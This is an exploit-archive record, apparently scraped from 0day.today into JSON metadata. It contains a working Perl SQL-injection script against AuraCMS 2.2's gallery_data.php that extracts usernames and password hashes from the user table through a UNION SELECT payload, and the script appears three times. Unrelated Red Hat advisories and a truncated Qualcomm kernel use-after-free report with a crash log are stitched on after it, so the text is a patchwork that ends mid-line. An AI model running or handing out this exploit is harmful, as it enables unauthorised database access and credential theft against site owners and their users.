ID 1337DAY-ID-2630
Type zdt
Reporter DNX
Modified 2008-02-12T00:00:00
Description
Exploit for unknown platform in category web applications
===========================================================
AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit
===========================================================
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Long;
#
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.auracms.org
# [!] Detected...: 19.01.2008
# [!] Reported...: 25.01.2008
# [!] Response...: 30.01.2008
#
# [!] Background.: AuraCMS is a CMS based on PHP and MySQL (the vulnerable query below runs through mysql_query())
#
# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173
#
# 173: case 'detail':
# 174: if (isset($_GET['id'])){
# 175: $id = $_GET['id'];
# 176: $albums = $_GET['albums'];
#
# 200: $query = mysql_query ("SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage");
#
# [!] Solution...: Install the vendor's gallery update. Root cause: $_GET['albums'] is interpolated unescaped into the query at line 200; the fix must escape or parameterise that value rather than rely on magic_quotes_gpc.
#
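# ---------------------------------------------------------------------------
# Command-line handling.
#
# Options are parsed BEFORE the positional arguments are read: Getopt::Long
# strips "-p ip:port" out of @ARGV, so reading $ARGV[0]/$ARGV[1] first (as the
# original did) turned a leading "-p" into the host name.  Trailing "-p" still
# works exactly as before.
# ---------------------------------------------------------------------------
my %options = ();
GetOptions(\%options, "p=s") or die "[!] Failed, bad option (see usage)\n";

# Need at least [Host] [Path]; otherwise print the banner/usage and stop.
if (!$ARGV[1])
{
    # Each banner line is printed preceded by a newline, and the block ends
    # with one more newline - same bytes as the original run of print()s.
    my @banner = (
        q{ \#'#/ },
        q{ (-.-) },
        q{ ---------------------oOO---(_)---OOo--------------------},
        q{ | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |},
        q{ | (works only with magic quotes = off) |},
        q{ | coded by DNX |},
        q{ --------------------------------------------------------},
        q{[!] Usage......: perl aura.pl [Host] [Path] <Options>},
        q{[!] Example....: perl aura.pl 127.0.0.1 /auracms/},
        q{[!] Options....:},
        q{ -p [ip:port] Proxy support},
    );
    print "\n$_" for @banner;
    print "\n";
    exit;
}

# File-level lexicals: sub exploit() below closes over these.
my $host = $ARGV[0];
my $path = $ARGV[1];

# Normalise the web-root path so "$host$path" . "index.php" always forms a
# valid URL (e.g. "auracms" -> "/auracms/").  "/auracms/" is left untouched.
$path = "/$path" unless $path =~ m{\A/};
$path .= "/"     unless $path =~ m{/\z};

print "[!] Exploiting...\n";

# Sends the probe + UNION requests and prints any "user hash" pairs found.
exploit();

print "\n[!] Exploit done\n";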
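# exploit()
#
# Runs the SQL injection against "http://$host$path" ($host, $path and
# %options are file-level lexicals filled from the command line) and prints
# one "<user> <hash>" line per row recovered from the `useraura` table.
#
# Dies with a message when:
#   * mod/gallery/ajax/gallery_data.php is not reachable,
#   * the probe or injection request fails at the HTTP level,
#   * magic_quotes_gpc is on (the server echoes the probe quote as \').
#
# Assumptions baked into the payload - confirm against the target version:
#   * "SELECT * FROM mod_gallery" returns 10 columns, so the UNION supplies 10;
#   * the user table is `useraura` with columns `user` and `password`;
#   * `password` holds 32-hex digests (the extraction regex keys on that).
#
# Only run this against systems you are authorised to test.
sub exploit
{
    my $base_url    = "http://" . $host . $path;
    my $gallery_url = $base_url . "index.php?pilih=gallery&mod=yes";
    my $ajax_url    = $base_url . "mod/gallery/ajax/gallery_data.php";
    my $ua          = LWP::UserAgent->new;
    my $jar         = HTTP::Cookies->new();
    # Matches the JSON fragment  :"<user>","name" ... <32 hex chars>
    # $1 is the user name, $3 the hash ($2 is the filler in between).
    my $hash_re     = qr/:"(.*?)","name"(.*)([a-fA-F0-9]{32})/;
    my $res;
    my $content;    # lexical - the original left this as an undeclared global

    if ($options{"p"})
    {
        $ua->proxy('http', "http://" . $options{"p"});
    }

    # 1. Is the vulnerable script reachable at all?
    $res = $ua->get($ajax_url);
    if (!$res->is_success)
    {
        die("[!] Failed, file not found\n");
    }

    # 2. Collect the cookie the gallery page sets and attach it to the agent.
    #    The ajax script is then fetched twice, as in the original flow -
    #    presumably to let the server initialise the session; verify if the
    #    target does not need it.
    $res = $ua->get($gallery_url);
    $jar->extract_cookies($res);
    $ua->cookie_jar($jar);
    $ua->get($ajax_url);
    $res = $ua->get($ajax_url);

    # 3. Probe with a lone single quote.  With magic_quotes_gpc=On PHP escapes
    #    it and the JSON reply carries "albums":["\\'"], meaning the quote
    #    never reaches the query unescaped -> not injectable this way.
    my $probe_url = $ajax_url . "?action=detail&id=&image=&albums='";
    $res = $ua->get($probe_url);
    if (!$res->is_success)
    {
        die("[!] Failed, probe request returned " . $res->status_line . "\n");
    }
    $content = $res->content;
    if ($content =~ /,\"albums\":\[\"\\\\'\"],/)
    {
        die("[!] Failed, magic quotes on\n");
    }

    # 4. UNION-based extraction.  The trailing /* comments out
    #    "$SQL_SORT LIMIT ..." that the application appends to the query.
    #    A non-2xx reply used to be parsed silently as "no rows"; report it.
    my $inject_url = $probe_url
        . "%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*";
    $res = $ua->get($inject_url);
    if (!$res->is_success)
    {
        die("[!] Failed, injection request returned " . $res->status_line . "\n");
    }
    $content = $res->content;

    # The reply is one JSON object per image; split on the "files" key so
    # each chunk holds at most one injected row.  The brace is escaped: an
    # unescaped literal "{" in a pattern is rejected by newer perls.
    my $found = 0;
    for my $chunk (split(/\{"files"/, $content))
    {
        if ($chunk =~ $hash_re)
        {
            print "$1 $3\n";
            $found++;
        }
    }
    print "[!] No credentials found in the response (column count or table name may differ)\n"
        unless $found;
}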
# 0day.today [2018-04-15] #
{"hash": "dd33587c944ce84dc0a2676cd7a1127362dfc26ab5d6039f351f8bd58ad17b21", "id": "1337DAY-ID-2630", "lastseen": "2018-04-15T01:53:36", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "9f37cd4417a90cc80ab48f539ba90beb", "key": "href"}, {"hash": "ebdce6bd4180a4964d52dcdd4be2223d", "key": "modified"}, {"hash": "ebdce6bd4180a4964d52dcdd4be2223d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b00776def4340d953ea7a51e7f43bd97", "key": "reporter"}, {"hash": "f32527bdbfad3640aef08a65c3546fdb", "key": "sourceData"}, {"hash": "5b565e1dda40599b6a4ce6e86d9ccd65", "key": "sourceHref"}, {"hash": "27a24f87136150c3df6a679ea1af13a0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2018-04-15T01:53:36"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:46941"]}, {"type": "zdt", "idList": ["1337DAY-ID-32820", "1337DAY-ID-30990"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4262"]}, {"type": "cve", "idList": ["CVE-2017-5753"]}, {"type": "nessus", "idList": ["STRUTS_2_5_10_1_RCE.NASL", "REDHAT-RHSA-2016-2107.NASL", "REDHAT-RHSA-2016-2110.NASL", "OPENSUSE-2016-1211.NASL"]}, {"type": "redhat", "idList": ["RHSA-2017:0372", "RHSA-2016:2110", "RHSA-2016:2107"]}, {"type": "suse", "idList": ["SUSE-SU-2016:2673-1", "SUSE-SU-2016:2638-1", "SUSE-SU-2016:2637-1", "SUSE-SU-2016:2635-1", "SUSE-SU-2016:2634-1", "SUSE-SU-2016:2631-1", "SUSE-SU-2016:2630-1", "SUSE-SU-2016:2629-1"]}], "modified": "2018-04-15T01:53:36"}, "vulnersScore": 4.5}, "type": "zdt", "sourceHref": 
"https://0day.today/exploit/2630", "description": "Exploit for unknown platform in category web applications", "title": "AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit", "history": [{"bulletin": {"hash": "97ccdfbc1913ddd3acdc6994f1d0b26de85f85b735318972223b997c3096ff76", "id": "1337DAY-ID-2630", "lastseen": "2016-04-20T02:25:57", "enchantments": {"score": {"value": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/", "modified": "2016-04-20T02:25:57"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "27a24f87136150c3df6a679ea1af13a0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b00776def4340d953ea7a51e7f43bd97", "key": "reporter"}, {"hash": "c5ec04558ce8d4c629c965a10e7546ca", "key": "sourceData"}, {"hash": "1bae08052bd1ce37bcbd209847c8d1e3", "key": "sourceHref"}, {"hash": "aa64a3e899e85e11b929cbc2c18088a3", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "ebdce6bd4180a4964d52dcdd4be2223d", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ebdce6bd4180a4964d52dcdd4be2223d", "key": "modified"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/2630", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===========================================================\r\nAuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit\r\n===========================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse HTTP::Cookies;\r\nuse Getopt::Long;\r\n\r\n#\r\n# 
[!] Discovered.: DNX\r\n# [!] Vendor.....: http://www.auracms.org\r\n# [!] Detected...: 19.01.2008\r\n# [!] Reported...: 25.01.2008\r\n# [!] Response...: 30.01.2008\r\n#\r\n# [!] Background.: AuraCMS is a CMS based on PHP and SQL\r\n#\r\n# [!] Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173\r\n#\r\n# 173: case 'detail':\r\n# 174: if (isset($_GET['id'])){\r\n# 175: $id = $_GET['id'];\r\n# 176: $albums = $_GET['albums'];\r\n#\r\n# 200: $query = mysql_query (\"SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage\");\r\n#\r\n# [!] Solution...: Install gallery update!\r\n#\r\n\r\nif(!$ARGV[1])\r\n{\r\n print \"\\n \\\\#'#/ \";\r\n print \"\\n (-.-) \";\r\n print \"\\n ---------------------oOO---(_)---OOo--------------------\";\r\n print \"\\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |\";\r\n print \"\\n | (works only with magic quotes = off) |\";\r\n print \"\\n | coded by DNX |\";\r\n print \"\\n --------------------------------------------------------\";\r\n print \"\\n[!] Usage......: perl aura.pl [Host] [Path] <Options>\";\r\n print \"\\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/\";\r\n print \"\\n[!] Options....:\";\r\n print \"\\n -p [ip:port] Proxy support\";\r\n print \"\\n\";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy %options = ();\r\nGetOptions(\\%options, \"p=s\");\r\n\r\nprint \"[!] Exploiting...\\n\";\r\n\r\nexploit();\r\n\r\nprint \"\\n[!] Exploit done\\n\";\r\n\r\nsub exploit\r\n{\r\n my $url1 = \"http://\".$host.$path.\"index.php?pilih=gallery&mod=yes\";\r\n my $url2 = \"http://\".$host.$path.\"mod/gallery/ajax/gallery_data.php\";\r\n my $ua = LWP::UserAgent->new;\r\n my $cookie = HTTP::Cookies->new();\r\n my $regexp = \":\\\"(.*?)\\\",\\\"name\\\"(.*)([a-fA-F0-9]{32})\";\r\n my $res = \"\";\r\n \r\n if($options{\"p\"})\r\n {\r\n $ua->proxy('http', \"http://\".$options{\"p\"});\r\n }\r\n \r\n ###############\r\n # exist file? 
#\r\n ###############\r\n $res = $ua->get($url2);\r\n if(!$res->is_success)\r\n {\r\n die(\"[!] Failed, file not found\\n\");\r\n }\r\n \r\n ##########################\r\n # get cookie from server #\r\n ##########################\r\n $res = $ua->get($url1);\r\n $cookie->extract_cookies($res);\r\n $ua->cookie_jar($cookie);\r\n $ua->get($url2);\r\n $res = $ua->get($url2);\r\n \r\n ######################\r\n # check magic quotes #\r\n ######################\r\n $url2 .= \"?action=detail&id=&image=&albums='\";\r\n $res = $ua->get($url2);\r\n $content = $res->content;\r\n \r\n if($content =~ /,\\\"albums\\\":\\[\\\"\\\\\\\\'\\\"],/)\r\n {\r\n die(\"[!] Failed, magic quotes on\\n\")\r\n }\r\n \r\n ##############\r\n # get hashes #\r\n ##############\r\n $url2 .= \"%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*\";\r\n $res = $ua->get($url2);\r\n $content = $res->content;\r\n \r\n my @cont = split(/{\\\"files\\\"/, $content);\r\n foreach (@cont)\r\n {\r\n if($_ =~ /$regexp/)\r\n {\r\n print \"$1 $3\\n\";\r\n }\r\n }\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2008-02-12T00:00:00", "references": [], "reporter": "DNX", "modified": "2008-02-12T00:00:00", "href": "http://0day.today/exploit/description/2630"}, "lastseen": "2016-04-20T02:25:57", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===========================================================\r\nAuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit\r\n===========================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse HTTP::Cookies;\r\nuse Getopt::Long;\r\n\r\n#\r\n# [!] Discovered.: DNX\r\n# [!] Vendor.....: http://www.auracms.org\r\n# [!] Detected...: 19.01.2008\r\n# [!] Reported...: 25.01.2008\r\n# [!] Response...: 30.01.2008\r\n#\r\n# [!] Background.: AuraCMS is a CMS based on PHP and SQL\r\n#\r\n# [!] 
Bug........: $_GET['albums'] in mod/gallery/ajax/gallery_data.php near line 173\r\n#\r\n# 173: case 'detail':\r\n# 174: if (isset($_GET['id'])){\r\n# 175: $id = $_GET['id'];\r\n# 176: $albums = $_GET['albums'];\r\n#\r\n# 200: $query = mysql_query (\"SELECT * FROM `mod_gallery` WHERE `kid` = '$albums' $SQL_SORT LIMIT $image,$limitimage\");\r\n#\r\n# [!] Solution...: Install gallery update!\r\n#\r\n\r\nif(!$ARGV[1])\r\n{\r\n print \"\\n \\\\#'#/ \";\r\n print \"\\n (-.-) \";\r\n print \"\\n ---------------------oOO---(_)---OOo--------------------\";\r\n print \"\\n | AuraCMS v2.2 (gallery_data.php) Remote SQL Injection |\";\r\n print \"\\n | (works only with magic quotes = off) |\";\r\n print \"\\n | coded by DNX |\";\r\n print \"\\n --------------------------------------------------------\";\r\n print \"\\n[!] Usage......: perl aura.pl [Host] [Path] <Options>\";\r\n print \"\\n[!] Example....: perl aura.pl 127.0.0.1 /auracms/\";\r\n print \"\\n[!] Options....:\";\r\n print \"\\n -p [ip:port] Proxy support\";\r\n print \"\\n\";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy %options = ();\r\nGetOptions(\\%options, \"p=s\");\r\n\r\nprint \"[!] Exploiting...\\n\";\r\n\r\nexploit();\r\n\r\nprint \"\\n[!] Exploit done\\n\";\r\n\r\nsub exploit\r\n{\r\n my $url1 = \"http://\".$host.$path.\"index.php?pilih=gallery&mod=yes\";\r\n my $url2 = \"http://\".$host.$path.\"mod/gallery/ajax/gallery_data.php\";\r\n my $ua = LWP::UserAgent->new;\r\n my $cookie = HTTP::Cookies->new();\r\n my $regexp = \":\\\"(.*?)\\\",\\\"name\\\"(.*)([a-fA-F0-9]{32})\";\r\n my $res = \"\";\r\n \r\n if($options{\"p\"})\r\n {\r\n $ua->proxy('http', \"http://\".$options{\"p\"});\r\n }\r\n \r\n ###############\r\n # exist file? #\r\n ###############\r\n $res = $ua->get($url2);\r\n if(!$res->is_success)\r\n {\r\n die(\"[!] 
Failed, file not found\\n\");\r\n }\r\n \r\n ##########################\r\n # get cookie from server #\r\n ##########################\r\n $res = $ua->get($url1);\r\n $cookie->extract_cookies($res);\r\n $ua->cookie_jar($cookie);\r\n $ua->get($url2);\r\n $res = $ua->get($url2);\r\n \r\n ######################\r\n # check magic quotes #\r\n ######################\r\n $url2 .= \"?action=detail&id=&image=&albums='\";\r\n $res = $ua->get($url2);\r\n $content = $res->content;\r\n \r\n if($content =~ /,\\\"albums\\\":\\[\\\"\\\\\\\\'\\\"],/)\r\n {\r\n die(\"[!] Failed, magic quotes on\\n\")\r\n }\r\n \r\n ##############\r\n # get hashes #\r\n ##############\r\n $url2 .= \"%20union%20select%20user,2,3,4,5,6,7,password,9,10%20from%20useraura/*\";\r\n $res = $ua->get($url2);\r\n $content = $res->content;\r\n \r\n my @cont = split(/{\\\"files\\\"/, $content);\r\n foreach (@cont)\r\n {\r\n if($_ =~ /$regexp/)\r\n {\r\n print \"$1 $3\\n\";\r\n }\r\n }\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-15] #", "published": "2008-02-12T00:00:00", "references": [], "reporter": "DNX", "modified": "2008-02-12T00:00:00", "href": "https://0day.today/exploit/description/2630"}
{"redhat": [{"lastseen": "2019-08-13T18:45:43", "bulletinFamily": "unix", "description": "Redis is an advanced key-value store. It is often referred to as a data-structure server since keys can contain strings, hashes, lists, sets, and sorted sets. For performance, Redis works with an in-memory data set. You can persist it either by dumping the data set to disk every once in a while, or by appending each command to a log.\n\nSecurity Fix(es):\n\n* redis: Heap buffer overflow in HyperLogLog triggered by malicious client (CVE-2019-10192)\n\n* redis: Heap corruption in lua_cmsgpack.c (CVE-2018-11218)\n\n* redis: Integer overflow in lua_struct.c:b_unpack() (CVE-2018-11219)\n\n* redis: Code execution in redis-cli via crafted command line arguments (CVE-2018-12326)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-07-25T20:02:37", "published": "2019-07-25T19:55:00", "id": "RHSA-2019:1860", "href": "https://access.redhat.com/errata/RHSA-2019:1860", "type": "redhat", "title": "(RHSA-2019:1860) Important: rh-redis32-redis security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-10-10T14:56:53", "bulletinFamily": "unix", "description": "The kernel-aarch64 package contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. 
(CVE-2016-5195, Important)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q) OR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with Transparent Ethernet Bridging(TEB) GRO support, is vulnerable to a stack overflow issue. It could occur while receiving large packets via GRO path, as an unlimited recursion could unfold in both VLAN and TEB modules, leading to a stack corruption in the kernel. (CVE-2016-7039, Important)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.\n\nBug Fix(es):\n\n* Previously, the operating system did not support the Mellanox ConnectX-4 PCIe Network Interface Controllers (NIC) in Ethernet mode. This update enables Ethernet support in the mlx5 driver. As a result, the Mellanox ConnectX-4 PCIe NICs now work in Ethernet mode as expected. (BZ#1413108)\n\n* On the Qualcomm Datacenter Technologies server platform with Qualcomm Datacenter Technologies Centriq 2400 CPU (QDF2400v1) memory accesses sometimes allocated Translation Lookaside Buffer (TLB) entries using an incorrect Address Space ID (ASID). This could consequently result in memory corruption and crashes under certain conditions. The underlying source code has been modified to handle the TTBRx_EL1[ASID] and TTBRx_EL1[BADDR] fields separately using a reserved ASID, and the described problem no longer occurs. 
(BZ#1421765)", "modified": "2017-10-10T18:15:31", "published": "2017-03-02T20:22:03", "id": "RHSA-2017:0372", "href": "https://access.redhat.com/errata/RHSA-2017:0372", "type": "redhat", "title": "(RHSA-2017:0372) Important: kernel-aarch64 security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-12-11T13:32:28", "bulletinFamily": "unix", "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q) OR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with Transparent Ethernet Bridging(TEB) GRO support, is vulnerable to a stack overflow issue. It could occur while receiving large packets via GRO path; As an unlimited recursion could unfold in both VLAN and TEB modules, leading to a stack corruption in the kernel. 
(CVE-2016-7039, Important)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.", "modified": "2018-03-19T16:29:53", "published": "2016-10-26T16:09:58", "id": "RHSA-2016:2110", "href": "https://access.redhat.com/errata/RHSA-2016:2110", "type": "redhat", "title": "(RHSA-2016:2110) Important: kernel-rt security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-11T13:33:12", "bulletinFamily": "unix", "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\n* Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q) OR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with Transparent Ethernet Bridging(TEB) GRO support, is vulnerable to a stack overflow issue. It could occur while receiving large packets via GRO path; As an unlimited recursion could unfold in both VLAN and TEB modules, leading to a stack corruption in the kernel. 
(CVE-2016-7039, Important)\n\nRed Hat would like to thank Phil Oester for reporting CVE-2016-5195.", "modified": "2018-06-07T08:58:33", "published": "2016-10-26T12:56:09", "id": "RHSA-2016:2107", "href": "https://access.redhat.com/errata/RHSA-2016:2107", "type": "redhat", "title": "(RHSA-2016:2107) Important: kernel-rt security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitdb": [{"lastseen": "2019-05-29T12:27:54", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-29T00:00:00", "published": "2019-05-29T00:00:00", "id": "EDB-ID:46941", "href": "https://www.exploit-db.com/exploits/46941", "type": "exploitdb", "title": "Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL", "sourceData": "The following issue exists in the android-msm-wahoo-4.4-pie branch of\r\nhttps://android.googlesource.com/kernel/msm (and possibly others):\r\n\r\nWhen kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable\r\nentry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages\r\nas dirty using the function set_page_dirty(). This function first loads\r\npage->mapping using page_mapping(), then calls the function pointer\r\nmapping->a_ops->set_page_dirty.\r\n\r\nThe bug is that, as explained in upstream commit e92bb4dd9673\r\n( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629),\r\nthe mapping of a page can be freed concurrently unless it is protected somehow\r\n(e.g. by holding the page lock, or by holding a reference to the mapping).\r\nFor callers who don't hold any such lock or reference, set_page_dirty_lock() is\r\nprovided to safely mark a page as dirty:\r\n\r\n==================================\r\n/*\r\n * set_page_dirty() is racy if the caller has no reference against\r\n * page->mapping->host, and if the page is unlocked. 
This is because another\r\n * CPU could truncate the page off the mapping and then free the mapping.\r\n *\r\n * Usually, the page _is_ locked, or the caller is a user-space process which\r\n * holds a reference on the inode by having an open file.\r\n *\r\n * In other cases, the page should be locked before running set_page_dirty().\r\n */\r\nint set_page_dirty_lock(struct page *page)\r\n{\r\n int ret;\r\n\r\n lock_page(page);\r\n ret = set_page_dirty(page);\r\n unlock_page(page);\r\n return ret;\r\n}\r\n==================================\r\n\r\n\r\nTo reproduce on a Pixel 2 (walleye):\r\n\r\n - Check out the tree specified above.\r\n - Enable KASAN in the kernel config.\r\n - Apply the attached kernel patch kgsl-bigger-race-window.patch to make the\r\n race window much bigger.\r\n - Build and boot the kernel.\r\n - Build the attached poc.c with\r\n `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`.\r\n - Run the PoC on the device (adb push, then run from adb shell).\r\n\r\nYou should see a kernel crash like this; note KASAN's report of a UAF in\r\nset_page_dirty():\r\n\r\n==================================\r\n<6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0\r\n<3>[ 447.372706] c3 2621 ==================================================================\r\n<3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0\r\n<3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621\r\n<3>[ 447.387059] c3 2621 \r\n<4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45\r\n<4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. 
MSM8998 v2.1 (DT)\r\n<4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put\r\n<4>[ 447.418479] c3 2621 Call trace:\r\n<4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4\r\n<4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c\r\n<4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc\r\n<4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340\r\n<4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340\r\n<4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90\r\n<4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0\r\n<4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218\r\n<4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c\r\n<4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c\r\n<4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718\r\n<4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130\r\n<4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40\r\n<3>[ 447.497696] c3 2621 \r\n<3>[ 447.503818] c3 2621 Allocated by task 2684:\r\n<4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8\r\n<4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20\r\n<4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124\r\n<4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4\r\n<4>[ 447.529547] c3 2621 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c\r\n<4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c\r\n<4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234\r\n<4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0\r\n<4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8\r\n<4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00\r\n<4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] 
